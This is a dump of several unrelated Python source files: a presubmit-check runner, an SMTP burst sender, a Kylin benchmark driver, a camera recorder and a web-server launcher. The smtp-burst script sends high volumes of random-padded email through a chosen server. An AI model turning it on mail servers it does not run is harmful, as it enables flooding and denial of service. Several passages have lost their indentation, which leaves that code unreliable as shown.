    root: Path where to stop searching.

  Return:
    List of absolute paths of the existing PRESUBMIT.py scripts.
  """
  absolute_files = [normpath(os.path.join(root, f)) for f in files]

  # Directories that directly contain at least one of the files.
  directories = set(os.path.dirname(f) for f in absolute_files)

  # When inherit-review-settings-ok exists, keep walking above root all the
  # way to the filesystem root.
  if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
    root = None

  # Walk each directory upwards, collecting every unique ancestor that might
  # hold a PRESUBMIT.py.
  candidates = set()
  for directory in directories:
    while directory not in candidates:
      candidates.add(directory)
      if directory == root:
        break
      parent = os.path.dirname(directory)
      if parent == directory:
        # We hit the system root directory.
        break
      directory = parent

  # Keep any PRESUBMIT*.py in the candidate directories, except test files.
  results = []
  for directory in sorted(candidates):
    try:
      entries = os.listdir(directory)
    except OSError:
      continue
    for entry in entries:
      full_path = os.path.join(directory, entry)
      if (os.path.isfile(full_path) and
          re.match(r'PRESUBMIT.*\.py$', entry) and
          not entry.startswith('PRESUBMIT_test')):
        results.append(full_path)

  logging.debug('Presubmit files: %s', ','.join(results))
  return results
class GetTryMastersExecuter(object):
  @staticmethod
  def ExecPresubmitScript(script_text, presubmit_path, project, change):
    """Executes GetPreferredTryMasters() from a single presubmit script.

    Args:
      script_text: The text of the presubmit script.
      presubmit_path: Project script to run.
      project: Project name to pass to presubmit script for bot selection.

    Return:
      A map of try masters to map of builders to set of tests.
    """
    context = {}
    try:
      # Python 2 exec-statement: the script runs with |context| as its
      # global namespace.
      exec script_text in context
    except Exception, e:
      raise PresubmitFailure('"%s" had an exception.\n%s'
                             % (presubmit_path, e))

    function_name = 'GetPreferredTryMasters'
    if function_name not in context:
      # The script doesn't define the hook; nothing to contribute.
      return {}
    get_preferred_try_masters = context[function_name]
    # The hook must accept exactly (project, change).
    if not len(inspect.getargspec(get_preferred_try_masters)[0]) == 2:
      raise PresubmitFailure(
          'Expected function "GetPreferredTryMasters" to take two arguments.')
    return get_preferred_try_masters(project, change)
class GetPostUploadExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, cl, change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
cl: The Changelist object.
change: The Change object.
Return:
A list of results objects.
"""
context = {}
try:
exec script_text in context
except Exception, e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
if not len(inspect.getargspec(post_upload_hook)[0]) == 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(cl, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.iteritems(),
masters2.iteritems()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.iteritems():
new_builders.setdefault(builder, set([])).update(tests)
return result
def DoGetTryMasters(change,
                    changed_files,
                    repository_root,
                    default_presubmit,
                    project,
                    verbose,
                    output_stream):
  """Get the list of try masters from the presubmit scripts.

  Args:
    changed_files: List of modified files.
    repository_root: The repository root.
    default_presubmit: A default presubmit script to execute in any case.
    project: Optional name of a project used in selecting trybots.
    verbose: Prints debug info.
    output_stream: A stream to write debug output to.

  Return:
    Map of try masters to map of builders to set of tests.
  """
  presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
  if not presubmit_files and verbose:
    output_stream.write("Warning, no PRESUBMIT.py found.\n")
  results = {}
  executer = GetTryMastersExecuter()

  if default_presubmit:
    if verbose:
      output_stream.write("Running default presubmit script.\n")
    fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
    results = _MergeMasters(results, executer.ExecPresubmitScript(
        default_presubmit, fake_path, project, change))
  for filename in presubmit_files:
    filename = os.path.abspath(filename)
    if verbose:
      output_stream.write("Running %s\n" % filename)
    # Accept CRLF presubmit script.
    presubmit_script = gclient_utils.FileRead(filename, 'rU')
    results = _MergeMasters(results, executer.ExecPresubmitScript(
        presubmit_script, filename, project, change))

  # Make sets to lists again for later JSON serialization.
  # values() instead of Python-2-only itervalues(): identical behavior on
  # Python 2, forward-compatible with Python 3.
  for builders in results.values():
    for builder in builders:
      builders[builder] = list(builders[builder])

  if results and verbose:
    output_stream.write('%s\n' % str(results))
  return results
def DoPostUploadExecuter(change,
                         cl,
                         repository_root,
                         verbose,
                         output_stream):
  """Execute the post upload hook.

  Args:
    change: The Change object.
    cl: The Changelist object.
    repository_root: The repository root.
    verbose: Prints debug info.
    output_stream: A stream to write debug output to.
  """
  presubmit_files = ListRelevantPresubmitFiles(
      change.LocalPaths(), repository_root)
  if not presubmit_files and verbose:
    output_stream.write("Warning, no PRESUBMIT.py found.\n")
  # The root presubmit file should be executed after the ones in
  # subdirectories — specific post upload hooks run before general ones —
  # so reverse the order provided by ListRelevantPresubmitFiles.
  presubmit_files.reverse()

  executer = GetPostUploadExecuter()
  results = []
  for filename in presubmit_files:
    filename = os.path.abspath(filename)
    if verbose:
      output_stream.write("Running %s\n" % filename)
    # Accept CRLF presubmit script.
    presubmit_script = gclient_utils.FileRead(filename, 'rU')
    results.extend(executer.ExecPresubmitScript(
        presubmit_script, filename, cl, change))
  output_stream.write('\n')
  if results:
    output_stream.write('** Post Upload Hook Messages **\n')
  for result in results:
    result.handle(output_stream)
    output_stream.write('\n')
  return results
class PresubmitExecuter(object):
  def __init__(self, change, committing, verbose,
               gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
    """
    Args:
      change: The Change object.
      committing: True if 'git cl land' is running, False if 'git cl upload' is.
      gerrit_obj: provides basic Gerrit codereview functionality.
      dry_run: if true, some Checks will be skipped.
      parallel: if true, all tests reported via input_api.RunTests for all
                PRESUBMIT files will be run in parallel.
    """
    self.change = change
    self.committing = committing
    self.gerrit = gerrit_obj
    self.verbose = verbose
    self.dry_run = dry_run
    # Extra addresses to CC, accumulated across every executed script.
    self.more_cc = []
    self.thread_pool = thread_pool
    self.parallel = parallel

  def ExecPresubmitScript(self, script_text, presubmit_path):
    """Executes a single presubmit script.

    Args:
      script_text: The text of the presubmit script.
      presubmit_path: The path to the presubmit file (this will be reported
        via input_api.PresubmitLocalPath()).

    Return:
      A list of result objects, empty if no problems.
    """
    # Change to the presubmit file's directory to support local imports.
    main_path = os.getcwd()
    os.chdir(os.path.dirname(presubmit_path))

    # Load the presubmit script into context.
    input_api = InputApi(self.change, presubmit_path, self.committing,
                         self.verbose, gerrit_obj=self.gerrit,
                         dry_run=self.dry_run, thread_pool=self.thread_pool,
                         parallel=self.parallel)
    output_api = OutputApi(self.committing)
    context = {}
    try:
      # Python 2 exec-statement: the script runs with |context| as globals.
      exec script_text in context
    except Exception, e:
      raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))

    # These function names must change if we make substantial changes to
    # the presubmit API that are not backwards compatible.
    if self.committing:
      function_name = 'CheckChangeOnCommit'
    else:
      function_name = 'CheckChangeOnUpload'
    if function_name in context:
      try:
        context['__args'] = (input_api, output_api)
        logging.debug('Running %s in %s', function_name, presubmit_path)
        result = eval(function_name + '(*__args)', context)
        logging.debug('Running %s done.', function_name)
        self.more_cc.extend(output_api.more_cc)
      finally:
        # Always delete temporary files created via the InputApi, even when
        # the check raised.  NOTE(review): map() is eager in Python 2; this
        # line would need a list() wrapper under Python 3.
        map(os.remove, input_api._named_temporary_files)
      if not (isinstance(result, types.TupleType) or
              isinstance(result, types.ListType)):
        raise PresubmitFailure(
            'Presubmit functions must return a tuple or list')
      for item in result:
        if not isinstance(item, OutputApi.PresubmitResult):
          raise PresubmitFailure(
              'All presubmit results must be of types derived from '
              'output_api.PresubmitResult')
    else:
      result = ()  # no error since the script doesn't care about current event.

    # Return the process to the original working directory.
    os.chdir(main_path)
    return result
def DoPresubmitChecks(change,
                      committing,
                      verbose,
                      output_stream,
                      input_stream,
                      default_presubmit,
                      may_prompt,
                      gerrit_obj,
                      dry_run=None,
                      parallel=False):
  """Runs all presubmit checks that apply to the files in the change.

  This finds all PRESUBMIT.py files in directories enclosing the files in the
  change (up to the repository root) and calls the relevant entrypoint
  function depending on whether the change is being committed or uploaded.

  Prints errors, warnings and notifications.  Prompts the user for warnings
  when needed.

  Args:
    change: The Change object.
    committing: True if 'git cl land' is running, False if 'git cl upload' is.
    verbose: Prints debug info.
    output_stream: A stream to write output from presubmit tests to.
    input_stream: A stream to read input from the user.
    default_presubmit: A default presubmit script to execute in any case.
    may_prompt: Enable (y/n) questions on warning or error. If False,
                any questions are answered with yes by default.
    gerrit_obj: provides basic Gerrit codereview functionality.
    dry_run: if true, some Checks will be skipped.
    parallel: if true, all tests specified by input_api.RunTests in all
              PRESUBMIT files will be run in parallel.

  Warning:
    If may_prompt is true, output_stream SHOULD be sys.stdout and input_stream
    SHOULD be sys.stdin.

  Return:
    A PresubmitOutput object. Use output.should_continue() to figure out
    if there were errors or warnings and the caller should abort.
  """
  # Swap in a copy of the environment and restore the original in the
  # finally-block below, so the mutation never leaks to the caller.
  old_environ = os.environ
  try:
    # Make sure python subprocesses won't generate .pyc files.
    os.environ = os.environ.copy()
    os.environ['PYTHONDONTWRITEBYTECODE'] = '1'

    output = PresubmitOutput(input_stream, output_stream)
    if committing:
      output.write("Running presubmit commit checks ...\n")
    else:
      output.write("Running presubmit upload checks ...\n")
    start_time = time.time()
    presubmit_files = ListRelevantPresubmitFiles(
        change.AbsoluteLocalPaths(), change.RepositoryRoot())
    if not presubmit_files and verbose:
      output.write("Warning, no PRESUBMIT.py found.\n")
    results = []
    thread_pool = ThreadPool()
    executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
                                 dry_run, thread_pool, parallel)
    if default_presubmit:
      if verbose:
        output.write("Running default presubmit script.\n")
      fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
      results += executer.ExecPresubmitScript(default_presubmit, fake_path)
    for filename in presubmit_files:
      filename = os.path.abspath(filename)
      if verbose:
        output.write("Running %s\n" % filename)
      # Accept CRLF presubmit script.
      presubmit_script = gclient_utils.FileRead(filename, 'rU')
      results += executer.ExecPresubmitScript(presubmit_script, filename)
    # Run everything queued via input_api.RunTests once all scripts ran.
    results += thread_pool.RunAsync()

    output.more_cc.extend(executer.more_cc)
    errors = []
    notifications = []
    warnings = []
    # Bucket the results by severity for the report below.
    for result in results:
      if result.fatal:
        errors.append(result)
      elif result.should_prompt:
        warnings.append(result)
      else:
        notifications.append(result)

    output.write('\n')
    for name, items in (('Messages', notifications),
                        ('Warnings', warnings),
                        ('ERRORS', errors)):
      if items:
        output.write('** Presubmit %s **\n' % name)
        for item in items:
          item.handle(output)
          output.write('\n')

    total_time = time.time() - start_time
    if total_time > 1.0:
      output.write("Presubmit checks took %.1fs to calculate.\n\n" % total_time)

    if errors:
      output.fail()
    elif warnings:
      output.write('There were presubmit warnings. ')
      if may_prompt:
        output.prompt_yes_no('Are you sure you wish to continue? (y/N): ')
    else:
      output.write('Presubmit checks passed.\n')

    global _ASKED_FOR_FEEDBACK
    # Ask for feedback one time out of 5.
    if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
      output.write(
          'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
          'to figure out which PRESUBMIT.py was run, then run git blame\n'
          'on the file to figure out who to ask for help.\n')
      _ASKED_FOR_FEEDBACK = True
    return output
  finally:
    os.environ = old_environ
def ScanSubDirs(mask, recursive):
  """Returns paths matching |mask|, skipping .svn and .git directories.

  When |recursive| is false only the current directory is globbed;
  otherwise the whole tree under '.' is walked.
  """
  if not recursive:
    return [p for p in glob.glob(mask) if p not in ('.svn', '.git')]

  matches = []
  for root, dirs, files in os.walk('.'):
    # Prune SCM metadata directories in place so os.walk skips them.
    for scm_dir in ('.svn', '.git'):
      if scm_dir in dirs:
        dirs.remove(scm_dir)
    for name in files:
      if fnmatch.fnmatch(name, mask):
        matches.append(os.path.join(root, name))
  return matches
def ParseFiles(args, recursive):
  """Expands each mask in |args| into a list of ('M', path) tuples."""
  logging.debug('Searching for %s', args)
  return [('M', path)
          for mask in args
          for path in ScanSubDirs(mask, recursive)]
def load_files(options, args):
  """Tries to determine the SCM.

  Returns a (change_class, files) pair; (None, None) when the directory is
  unversioned and no explicit files were supplied.
  """
  files = ParseFiles(args, options.recursive) if args else []
  if scm.determine_scm(options.root) == 'git':
    change_class = GitChange
    if not files:
      # Fall back to git status against the upstream branch.
      upstream = options.upstream or None
      files = scm.GIT.CaptureStatus([], options.root, upstream)
  else:
    logging.info("Doesn't seem under source control. Got %d files", len(args))
    if not files:
      return None, None
    change_class = Change
  return change_class, files
@contextlib.contextmanager
def canned_check_filter(method_names):
  """Context manager that temporarily disables the named canned checks.

  Each name in |method_names| that exists on presubmit_canned_checks is
  replaced with a stub returning an empty result list; unknown names are
  logged and skipped. The real checks are restored on exit, even if the
  body raises.
  """
  filtered = {}
  try:
    for method_name in method_names:
      if not hasattr(presubmit_canned_checks, method_name):
        logging.warn('Skipping unknown "canned" check %s' % method_name)
        continue
      # Remember the real check so it can be restored, then stub it out
      # module-wide (this mutates shared global state until exit).
      filtered[method_name] = getattr(presubmit_canned_checks, method_name)
      setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
    yield
  finally:
    # Restore the saved checks (Python 2 dict iteration).
    for name, method in filtered.iteritems():
      setattr(presubmit_canned_checks, name, method)
def main(argv=None):
  """Command-line entry point for running presubmit checks standalone.

  Parses options, loads the change from the local checkout (optionally
  augmented from Gerrit), runs DoPresubmitChecks, and returns a process
  exit code: falsy on success, truthy on check failure, 2 on internal
  failure. NOTE: this file is Python 2 (see the except/print syntax at
  the bottom).
  """
  parser = optparse.OptionParser(usage="%prog [options] <files...>",
                                 version="%prog " + str(__version__))
  parser.add_option("-c", "--commit", action="store_true", default=False,
                    help="Use commit instead of upload checks")
  parser.add_option("-u", "--upload", action="store_false", dest='commit',
                    help="Use upload instead of commit checks")
  parser.add_option("-r", "--recursive", action="store_true",
                    help="Act recursively")
  parser.add_option("-v", "--verbose", action="count", default=0,
                    help="Use 2 times for more debug info")
  parser.add_option("--name", default='no name')
  parser.add_option("--author")
  parser.add_option("--description", default='')
  parser.add_option("--issue", type='int', default=0)
  parser.add_option("--patchset", type='int', default=0)
  parser.add_option("--root", default=os.getcwd(),
                    help="Search for PRESUBMIT.py up to this directory. "
                         "If inherit-review-settings-ok is present in this "
                         "directory, parent directories up to the root file "
                         "system directories will also be searched.")
  parser.add_option("--upstream",
                    help="Git only: the base ref or upstream branch against "
                         "which the diff should be computed.")
  parser.add_option("--default_presubmit")
  parser.add_option("--may_prompt", action='store_true', default=False)
  parser.add_option("--skip_canned", action='append', default=[],
                    help="A list of checks to skip which appear in "
                         "presubmit_canned_checks. Can be provided multiple times "
                         "to skip multiple canned checks.")
  parser.add_option("--dry_run", action='store_true',
                    help=optparse.SUPPRESS_HELP)
  parser.add_option("--gerrit_url", help=optparse.SUPPRESS_HELP)
  parser.add_option("--gerrit_fetch", action='store_true',
                    help=optparse.SUPPRESS_HELP)
  parser.add_option('--parallel', action='store_true',
                    help='Run all tests specified by input_api.RunTests in all '
                         'PRESUBMIT files in parallel.')
  options, args = parser.parse_args(argv)
  # Map the -v count onto logging verbosity.
  if options.verbose >= 2:
    logging.basicConfig(level=logging.DEBUG)
  elif options.verbose:
    logging.basicConfig(level=logging.INFO)
  else:
    logging.basicConfig(level=logging.ERROR)
  change_class, files = load_files(options, args)
  if not change_class:
    parser.error('For unversioned directory, <files> is not optional.')
  logging.info('Found %d file(s).', len(files))
  gerrit_obj = None
  if options.gerrit_fetch and options.gerrit_url:
    # Pull author/description from Gerrit instead of the command line.
    assert options.issue and options.patchset
    gerrit_obj = GerritAccessor(urlparse.urlparse(options.gerrit_url).netloc)
    options.author = gerrit_obj.GetChangeOwner(options.issue)
    options.description = gerrit_obj.GetChangeDescription(options.issue,
                                                          options.patchset)
    logging.info('Got author: "%s"', options.author)
    logging.info('Got description: """\n%s\n"""', options.description)
  try:
    # Temporarily disable any canned checks the caller asked to skip.
    with canned_check_filter(options.skip_canned):
      results = DoPresubmitChecks(
          change_class(options.name,
                       options.description,
                       options.root,
                       files,
                       options.issue,
                       options.patchset,
                       options.author,
                       upstream=options.upstream),
          options.commit,
          options.verbose,
          sys.stdout,
          sys.stdin,
          options.default_presubmit,
          options.may_prompt,
          gerrit_obj,
          options.dry_run,
          options.parallel)
    return not results.should_continue()
  except PresubmitFailure, e:
    # Python 2 exception syntax; prints go to stderr.
    print >> sys.stderr, e
    print >> sys.stderr, 'Maybe your depot_tools is out of date?'
    return 2
if __name__ == '__main__':
  # Make stdout/stderr unicode-safe before any output is produced.
  fix_encoding.fix_encoding()
  try:
    sys.exit(main())
  except KeyboardInterrupt:
    # Ctrl-C: exit quietly with a conventional non-zero status.
    sys.stderr.write('interrupted\n')
    sys.exit(2)
|
burstMain.py | import time, os, sys
from multiprocessing import Process, current_process, Manager, Value
from burstVars import *
from burstGen import *
# Main script routine
# Main script routine
if __name__ == '__main__':
    print("Starting smtp-burst")
    manager = Manager()
    # Shared failure counter, incremented by sendmail() child processes.
    SB_FAILCOUNT = manager.Value('i', 0)
    print("Generating %s of data to append to message" % (sizeof_fmt(SB_SIZE)))
    SB_MESSAGE = appendMessage()
    print("Message using %s of random data" % (sizeof_fmt(sys.getsizeof(SB_MESSAGE))))
    print("Sending %s messages from %s to %s through %s" % (SB_TOTAL, SB_SENDER, SB_RECEIVERS, SB_SERVER))
    for x in range(0, SB_BURSTS):
        quantity = range(1, SB_SGEMAILS + 1)
        procs = []
        # BUG FIX: the original used the C-style '&&' operator, which is a
        # SyntaxError in Python; the boolean operator is 'and'.
        if SB_FAILCOUNT.value >= SB_STOPFQNT and SB_STOPFAIL:
            break
        for index, number in enumerate(quantity):
            # Stop launching senders once the failure threshold is reached
            # (same '&&' -> 'and' fix as above).
            if SB_FAILCOUNT.value >= SB_STOPFQNT and SB_STOPFAIL:
                break
            # Throttle process launches to SB_SGEMAILSPSEC seconds apart.
            time.sleep(SB_SGEMAILSPSEC)
            process = Process(target=sendmail, args=(number + (x * SB_SGEMAILS), x + 1, SB_FAILCOUNT, SB_MESSAGE))
            procs.append(process)
            process.start()
        # Wait for the whole burst to finish before pausing.
        for process in procs:
            process.join()
        time.sleep(SB_BURSTSPSEC)
kylin.py | from logging import setLogRecordFactory
import queue
import traceback
from threading import Thread
import sqlalchemy as sa
from common import util
class IDEBenchDriver:
    """IDEBench driver that executes visualization queries against Apache Kylin."""

    def init(self, options, schema, driver_arg):
        """Store connection settings from driver_arg and reset driver state.

        Args:
            options: IDEBench options (unused here; kept for interface parity).
            schema: Dataset schema (unused here; kept for interface parity).
            driver_arg: Dict with 'host', 'port', 'user', 'password', 'db',
                'table' and 'table_to_replace' keys.
        """
        self.time_of_latest_request = 0
        self.isRunning = False
        # LIFO queue: the freshest request is served first; stale requests
        # are dropped in process().
        self.requests = queue.LifoQueue()
        # kylin properties
        print("kylin configuration")
        print("kylin host: %s" % driver_arg['host'])
        print("kylin database: %s" % driver_arg['db'])
        print("kylin table name: %s" % driver_arg['table'])
        self.host = driver_arg['host']
        self.port = driver_arg['port']
        self.user = driver_arg['user']
        self.password = driver_arg['password']
        self.db = driver_arg['db']
        self.table = driver_arg['table']
        self.table_to_replace = driver_arg['table_to_replace']

    def _create_engine(self):
        """Build a SQLAlchemy engine for the configured Kylin instance."""
        return sa.create_engine(
            'kylin://{}:{}@{}:{}/{}'.format(
                self.user, self.password, self.host, self.port, self.db),
            connect_args={'is_ssl': False, 'timeout': 60})

    def workflow_start(self):
        """Open the Kylin engine and start the request-processing thread."""
        self.isRunning = True
        self.time_of_latest_request = 0
        # connection
        self.kylin_engine = self._create_engine()
        thread = Thread(target=self.process)
        thread.start()

    def workflow_end(self):
        """Stop the processing loop and release pooled Kylin connections."""
        self.isRunning = False
        # BUG FIX: self.conn was never assigned anywhere in this class
        # (connections are managed through self.kylin_engine), so the
        # original self.conn.close() raised AttributeError. Dispose of the
        # engine's connection pool instead.
        self.kylin_engine.dispose()

    def execute_vizrequest(self, viz_request, options, schema, result_queue):
        """Run one visualization query against Kylin and record its timing."""
        print("processsing...")
        viz = viz_request.viz
        sql_statement = viz.get_computed_filter_as_sql(schema)
        # make sql acceptable to kylin
        sql_statement = sql_statement.replace(self.table_to_replace, self.table)
        # NOTE(review): a plain substring replace also rewrites 'count'
        # inside identifiers/literals -- presumably intentional for this
        # benchmark's generated SQL; verify against the query generator.
        sql_statement = sql_statement.replace('count', '_count')
        print(sql_statement)
        viz_request.start_time = util.get_current_ms_time()
        self.kylin_engine.execute(sql_statement)
        viz_request.end_time = util.get_current_ms_time()
        print('kylin query time: '+str(viz_request.end_time-viz_request.start_time))
        # write an empty result to the viz_request
        viz_request.result = {}
        # notify IDEBench that processing is done by writing it to the result buffer
        result_queue.put(viz_request)

    def process_request(self, viz_request, options, schema, result_queue):
        """Queue a request for asynchronous execution by process()."""
        self.requests.put((viz_request, options, schema, result_queue))

    def process(self):
        """Drain the request queue until workflow_end() clears isRunning."""
        while self.isRunning:
            try:
                viz_request, options, schema, result_queue = self.requests.get(timeout=1)
                # only execute requests that are newer than the last one we
                # processed (drops old/no longer needed queries)
                if viz_request.expected_start_time < self.time_of_latest_request:
                    viz_request.dropped = True
                    result_queue.put(viz_request)
                    continue
                self.time_of_latest_request = viz_request.expected_start_time
                self.execute_vizrequest(viz_request, options, schema, result_queue)
            except queue.Empty:
                # ignore queue-empty exceptions
                print('requests queue empty.')
            except Exception:
                traceback.print_exc()
                # Kylin hit an unknown error; re-create the connection.
                self.kylin_engine = self._create_engine()
|
recorder.py | """Recorder."""
import datetime
import logging
import os
from threading import Thread
import cv2
import viseron.helpers as helpers
from viseron.cleanup import SegmentCleanup
from viseron.mqtt.camera import MQTTCamera
from viseron.segments import Segments
LOGGER = logging.getLogger(__name__)
class FFMPEGRecorder:
    """Creates thumbnails and recordings."""

    def __init__(self, config, detection_lock):
        """Set up logging, segmenter, segment cleanup and MQTT devices.

        Args:
            config: Camera/recorder configuration object.
            detection_lock: Lock shared with the detection pipeline, handed
                to the Segments helper.
        """
        self._logger = logging.getLogger(__name__ + "." + config.camera.name_slug)
        # Recorder-specific log level takes precedence over the camera's.
        if getattr(config.recorder.logging, "level", None):
            self._logger.setLevel(config.recorder.logging.level)
        elif getattr(config.camera.logging, "level", None):
            self._logger.setLevel(config.camera.logging.level)
        self._logger.debug("Initializing ffmpeg recorder")
        self.config = config
        self.is_recording = False
        self.last_recording_start = None
        self.last_recording_end = None
        self._event_start = None
        self._event_end = None
        self._recording_name = None
        segments_folder = os.path.join(
            config.recorder.segments_folder, config.camera.name
        )
        self.create_directory(segments_folder)
        self._segmenter = Segments(
            self._logger, config, segments_folder, detection_lock
        )
        self._segment_cleanup = SegmentCleanup(config)
        self._mqtt_devices = {}
        if self.config.recorder.thumbnail.send_to_mqtt:
            self._mqtt_devices["latest_thumbnail"] = MQTTCamera(
                config, object_id="latest_thumbnail"
            )

    def on_connect(self):
        """Called when MQTT connection is established."""
        for device in self._mqtt_devices.values():
            device.on_connect()

    def subfolder_name(self, today):
        """Generate name of folder for recording, e.g. '2021-03-05/front_door'."""
        return (
            f"{today.year:04}-{today.month:02}-{today.day:02}/{self.config.camera.name}"
        )

    def create_thumbnail(self, file_name, frame, objects, resolution):
        """Create thumbnails, sent to MQTT and/or saved to disk based on config."""
        helpers.draw_objects(
            frame.decoded_frame_umat_rgb,
            objects,
            resolution,
        )
        cv2.imwrite(file_name, frame.decoded_frame_umat_rgb)
        if self.config.recorder.thumbnail.save_to_disk:
            thumbnail_folder = os.path.join(
                self.config.recorder.folder, "thumbnails", self.config.camera.name
            )
            self.create_directory(thumbnail_folder)
            # Lazy %-style args avoid formatting work when DEBUG is off.
            self._logger.debug("Saving thumbnail in %s", thumbnail_folder)
            if not cv2.imwrite(
                os.path.join(thumbnail_folder, "latest_thumbnail.jpg"),
                frame.decoded_frame_umat_rgb,
            ):
                self._logger.error("Failed saving thumbnail to disk")
        if self.config.recorder.thumbnail.send_to_mqtt and self._mqtt_devices:
            ret, jpg = cv2.imencode(".jpg", frame.decoded_frame_umat_rgb)
            if ret:
                self._mqtt_devices["latest_thumbnail"].publish(jpg.tobytes())

    def create_directory(self, path):
        """Create a directory (and missing parents) if it does not exist."""
        if os.path.isdir(path):
            return
        self._logger.debug("Creating folder %s", path)
        # exist_ok closes the race where another thread/process creates the
        # folder between the isdir check and makedirs (the original code
        # handled this with a try/except FileExistsError).
        os.makedirs(path, exist_ok=True)

    def start_recording(self, frame, objects, resolution):
        """Start recording: create output folder, thumbnail and video name."""
        self._logger.info("Starting recorder")
        self.is_recording = True
        # Pause cleanup so segments needed for this recording survive.
        self._segment_cleanup.pause()
        now = datetime.datetime.now()
        self.last_recording_start = now.isoformat()
        self.last_recording_end = None
        self._event_start = int(now.timestamp())
        if self.config.recorder.folder is None:
            self._logger.error("Output directory is not specified")
            return
        # Create filename. Reuse the timestamp captured above (the original
        # called datetime.now() a second time here) so folder, video and
        # thumbnail names all agree.
        video_name = (
            f"{now.strftime(self.config.recorder.filename_pattern)}"
            f".{self.config.recorder.extension}"
        )
        thumbnail_name = (
            f"{now.strftime(self.config.recorder.thumbnail.filename_pattern)}.jpg"
        )
        # Create foldername
        subfolder = self.subfolder_name(now)
        full_path = os.path.join(self.config.recorder.folder, subfolder)
        self.create_directory(full_path)
        if frame:
            self.create_thumbnail(
                os.path.join(full_path, thumbnail_name), frame, objects, resolution
            )
        self._recording_name = os.path.join(full_path, video_name)

    def concat_segments(self):
        """Concatenate FFmpeg segments to a single video."""
        self._segmenter.concat_segments(
            self._event_start - self.config.recorder.lookback,
            self._event_end,
            self._recording_name,
        )
        # Dont resume cleanup if new recording started during encoding
        if not self.is_recording:
            self._segment_cleanup.resume()

    def stop_recording(self):
        """Stop recording and concatenate segments in a background thread."""
        self._logger.info("Stopping recorder")
        self.is_recording = False
        now = datetime.datetime.now()
        self.last_recording_end = now.isoformat()
        self._event_end = int(now.timestamp())
        concat_thread = Thread(target=self.concat_segments)
        concat_thread.start()
|
serve.py | # Most of this code is:
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# The server command includes the additional header:
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
# Code taken also from QP:
# http://www.mems-exchange.org/software/qp/
# From lib/site.py
# Galaxy originally used PasteScript and PasteDeploy for application
# loading, to maintain compatibility we've internalized some of that
# code here, stripping out uneeded functionality.
# All top level imports from each package moved here and organized
import ConfigParser
import atexit
import errno
import getpass
import logging
import optparse
import os
import re
import subprocess
import sys
import textwrap
import threading
import time
from logging.config import fileConfig
from loadwsgi import loadapp, loadserver
difflib = None
# ---- from paste.script.bool_optparse --------------------------------
"""
A subclass of ``optparse.OptionParser`` that allows boolean long
options (like ``--verbose``) to also take arguments (like
``--verbose=true``). Arguments *must* use ``=``.
"""
try:
_ = optparse._
except AttributeError:
from gettext import gettext as _
class BoolOptionParser(optparse.OptionParser):
    """OptionParser whose long boolean flags accept ``--opt=true``/``--opt=false``."""

    def _process_long_opt(self, rargs, values):
        # Overrides optparse.OptionParser._process_long_opt to interpret an
        # explicit value attached to a flag that normally takes none.
        arg = rargs.pop(0)
        # Value explicitly attached to arg? Pretend it's the next
        # argument.
        if "=" in arg:
            (opt, next_arg) = arg.split("=", 1)
            rargs.insert(0, next_arg)
            had_explicit_value = True
        else:
            opt = arg
            had_explicit_value = False
        opt = self._match_long_opt(opt)
        option = self._long_opt[opt]
        if option.takes_value():
            # Standard optparse handling for value-taking options.
            nargs = option.nargs
            if len(rargs) < nargs:
                if nargs == 1:
                    self.error(_("%s option requires an argument") % opt)
                else:
                    self.error(_("%s option requires %d arguments")
                               % (opt, nargs))
            elif nargs == 1:
                value = rargs.pop(0)
            else:
                value = tuple(rargs[0:nargs])
                del rargs[0:nargs]
        elif had_explicit_value:
            # Boolean flag given an explicit value: consume and interpret it.
            value = rargs[0].lower().strip()
            del rargs[0:1]
            if value in ('true', 'yes', 'on', '1', 'y', 't'):
                # Truthy: behave exactly as if the bare flag was passed.
                value = None
            elif value in ('false', 'no', 'off', '0', 'n', 'f'):
                # Don't process -- falsy leaves the option at its default.
                return
            else:
                self.error(_('%s option takes a boolean value only (true/false)') % opt)
        else:
            value = None
        option.process(opt, value, values, self)
# ---- from paste.script.command --------------------------------------
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
class BadCommand(Exception):
    """User-facing command error carrying a process exit code (default 2)."""

    def __init__(self, message, exit_code=2):
        self.message = message
        self.exit_code = exit_code
        Exception.__init__(self, message)

    def _get_message(self):
        """Getter for 'message'; needed only to override deprecation
        in BaseException."""
        return self.__message

    def _set_message(self, value):
        """Setter for 'message'; needed only to override deprecation
        in BaseException."""
        self.__message = value

    # BaseException.message has been deprecated since Python 2.6.
    # To prevent DeprecationWarning from popping up over this
    # pre-existing attribute, use a new property that takes lookup
    # precedence.
    message = property(_get_message, _set_message)
class NoDefault(object):
    """Sentinel type used to distinguish 'no value supplied' from None."""
    pass
# run and invoke methods moved below ServeCommand
class Command(object):
    """Base class for paster-style subcommands.

    Subclasses must define ``parser``, ``summary`` and ``command()``; run()
    drives parsing, validation and invocation.
    """

    def __init__(self, name):
        # Name the command was invoked as (used in usage/help output).
        self.command_name = name

    max_args = None
    max_args_error = 'You must provide no more than %(max_args)s arguments'
    min_args = None
    min_args_error = 'You must provide at least %(min_args)s arguments'
    required_args = None
